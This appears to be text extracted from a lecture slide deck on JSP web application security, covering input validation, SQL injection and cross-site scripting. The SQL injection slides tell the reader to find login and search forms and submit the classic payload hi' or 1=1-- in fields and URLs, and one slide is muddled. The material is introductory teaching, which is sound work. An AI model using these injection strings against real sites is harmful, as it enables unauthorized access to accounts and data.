Вы находитесь на странице: 1из 11

Security

Nguyn Quc Nguyn

Introduction
various dynamic content generation environments powering the World Wide Web are intended and designed precisely to provide more power to developers and greater convenience for end-users Security is thus an aspect that must be explicitly factored in by the system architects and developers, and is rarely effective as an afterthought

Introduction contd
These are the immediate means by which adversaries can affect the system, and are invariably subjected to stress during attempts to identify and exploit vulnerabilities The universal defense strategy against all related attacks is known as input validation. On a parallel level, security exposures are direct consequences of two main design errors:
An anti-Scripting measure of the cross site SQL injection

Security Issues
By the sheer virtue of providing access to resources on a server, insecure Java servlets derived from JSP pages can put at risk any or all of the server the clients accessing the pages, and through possible DDoS and worm distribution attacks, the entire Internet Validating input and controlling access to resources always need to be considered

SQL Injection
is subset of the an unverified/unsanitized user input vulnerability and the idea is to convince the application to run SQL code that was not intended (via web pages) Many web pages take parameters from web user, and make SQL query to the database. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else

What do you need?


Any web browser

What you should look for?


Try to look for pages that allow you to submit data, i.e: login page, search page, feedback Sometimes, HTML pages use POST command to send parameters to another JSP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code.

How do you test if it is vulnerable?


Start with a single quote trick. Input something like: hi' or 1=1-into login, or password, or even in the URL. Example: - Login: hi' or 1=1-- Pass: hi' or 1=1-- http://duck/index.jsp?id=hi' or 1=1--

Cross Site Scripting


CERT Advisory CA-2000-02 describes the problem of malicious HTML tags embedded in client Web requests which is somewhat of a misnomer since it isn't just about scripting, and there is nothing especially cross site about it, but the term has stuck from when the issue was less well understood

Cross Site Scripting (2)


The attack usually consists of an illmeaning user submitting client-side executable scripts (e.g. JavaScript code) or vicious HTML (or XML) tags which the JSP server then includes in a dynamically generated page The attack may be targeted against other clients, or less commonly, against the server.

Cross Site Scripting (3)


Commonly abused tags are those that allow embedding of code inside a page, such as <SCRIPT>, <OBJECT>, <APPLET>, and <EMBED>. Mitigation of the problem is of course achieved through input validation and output filtering

Вам также может понравиться